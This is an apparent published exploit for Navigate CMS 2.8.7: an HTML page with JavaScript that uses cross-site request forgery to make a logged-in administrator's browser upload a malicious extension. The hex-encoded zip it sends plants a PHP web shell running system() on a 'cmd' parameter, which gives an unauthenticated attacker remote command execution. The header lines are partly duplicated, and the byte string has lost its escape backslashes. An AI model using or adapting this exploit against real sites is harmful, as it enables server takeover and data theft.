# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# # Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE:

<!--
After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location):
http://DOMAIN.com/navigate/plugins/chiv/chiv.php
-->

<script>
var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload";

function byteValue(x) {
return x.charCodeAt(0) & 0xff;
}

function toBytes(datastr) {
var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
return ui8a.buffer;
}

if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
this.send(toBytes(datastr));
}
}

function fileUpload(fileData, fileName) {
var fileSize = fileData.length,
boundary = "---------------------------399386530342483226231822376790",
uri = logUrl,
xhr = new XMLHttpRequest();

var additionalFields = {
}

var fileFieldName = "extension-upload";

xhr.open("POST", uri, true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
xhr.setRequestHeader("Content-Length", fileSize);
xhr.withCredentials = "true";

xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {

if (xhr.responseText != "") {
alert(JSON.parse(xhr.responseText).msg); // display response.
}
} else if (xhr.status == 0) {
$("#goto").show();
}
}
}

var body = "";

for (var i in additionalFields) {
if (additionalFields.hasOwnProperty(i)) {
body += addField(i, additionalFields[i], boundary);
}
}

body += addFileField(fileFieldName, fileData, fileName, boundary);
body += "--" + boundary + "--";
xhr.sendAsBinary(body);
return true;
}

function addField(name, value, boundary) {
var c = "--" + boundary + " "
c += "Content-Disposition: form-data; name='" + name + "' ";
c += value + " ";
return c;
}

function addFileField(name, value, filename, boundary) {
var c = "--" + boundary + " "
c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "' ";
c += "Content-Type: application/zip ";
c += value + " ";
return c;
}

var start = function() {
var c = "x50x4bx03x04x0ax00x00x00x00x00x77x9ex97x50x00x00x00x00x00x00x00x00x00x00x00x00x05x00x1cx00x63x68x69x76x2fx55x54x09x00x03xc2xe3xa1x5exdbxe3xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x50x4bx03x04x14x00x00x00x08x00xa4x9dx97x50x02x75x9fx67x85x00x00x00xc0x00x00x00x10x00x1cx00x63x68x69x76x2fx63x68x69x76x2ex70x6cx75x67x69x6ex55x54x09x00x03x33xe2xa1x5ex42xe2xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x55x8dx41x0axc2x30x10x45xf7x39xc5x90xb5x34x48x17x42x57x4axc9x05xeax09x62x32x90xa0xe9x84x64x5ax15xf1xeexdaxd8x2exfcxcbxffx1exffxbfx04x7cx23x39xf0x0dx65x07xf2x34xc0x59x6bxd0x72xf7x03x33xe6x12x68x5cxd0xbex69xdbxc3xd6x9bx89x3dxe5xa5xeex7dx98x0dxd3x06xeex78x29x81xebx96x67x4exa5x53xcax1bx7bx8dxaex09xa4x8exf6x5fx76x58x6cx0ex89xd7x87x01x23x31x42x4fx31x9axd1x81x7exa0x9dx2ax5bx75x7exa6x3axbcx7dx88xb7xf8x00x50x4bx03x04x0ax00x00x00x00x00x1cx9ex97x50x37x55x33xfdx3bx00x00x00x3bx00x00x00x15x00x1cx00x63x68x69x76x2fx63x68x69x76x2ex69x6ex66x6fx2ex70x6cx75x67x69x6ex55x54x09x00x03x18xe3xa1x5ex06xe3xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x3cx68x31x3ex57x65x6cx63x6fx6dx65x20x74x6fx20x43x68x69x76x61x74x6fx27x73x20x52x43x45x20x70x6cx75x67x69x6ex20x66x6fx72x20x4ex61x76x69x67x61x74x65x20x43x4dx53x2ex3cx2fx68x31x3ex0ax50x4bx03x04x0ax00x00x00x00x00x71x9ex97x50xfax43x48xabx1fx00x00x00x1fx00x00x00x0dx00x1cx00x63x68x69x76x2fx63x68x69x76x2ex70x68x70x55x54x09x00x03xb5xe3xa1x5exa4xe3xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x3cx3fx70x68x70x20x73x79x73x74x65x6dx28x24x5fx47x45x54x5bx27x63x6dx64x27x5dx29x3bx20x3fx3ex0ax50x4bx01x02x1ex03x0ax00x00x00x00x00x77x9ex97x50x00x00x00x00x00x00x00x00x00x00x00x00x05x00x18x00x00x00x00x00x00x00x10x00xffx41x00x00x00x00x63x68x69x76x2fx55x54x05x00x03xc2xe3xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x50x4bx01x02x1ex03x14x00x00x00x08x00xa4x9dx97x50x02x75x9fx67x85x00x00x00xc0x00x00x00x10x00x18x00x00x00x00x00x01x00x00x00xffx81x3fx00x00x00x63x68x69x76x2fx63x68x69x76x2ex70x6cx75x67x69x6ex55x54x05x00x03x33xe2xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x50x4bx01x02x1ex03x0ax00x00x00x00x00x1cx9ex97x50x37x55x33xfdx3bx00x00x00x3bx00x00x00x15x00x18x00x00x00x00x00x01x00x00x00xa4x81x0ex01x00x00x63x68x69x76x2fx63x68x69x76x2ex69x6ex66x6fx2ex70x6cx75x67x69x6ex55x54x05x00x03x18xe3xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x50x4bx01x02x1ex03x0ax00x00x00x00x00x71x9ex97x50xfax43x48xabx1fx00x00x00x1fx00x00x00x0dx00x18x00x00x00x00x00x01x00x00x00xa4x81x98x01x00x00x63x68x69x76x2fx63x68x69x76x2ex70x68x70x55x54x05x00x03xb5xe3xa1x5ex75x78x0bx00x01x04xe8x03x00x00x04xe8x03x00x00x50x4bx05x06x00x00x00x00x04x00x04x00x4fx01x00x00xfex01x00x00x00x00"
fileUpload(c, "chiv.zip");
};

start();
</script>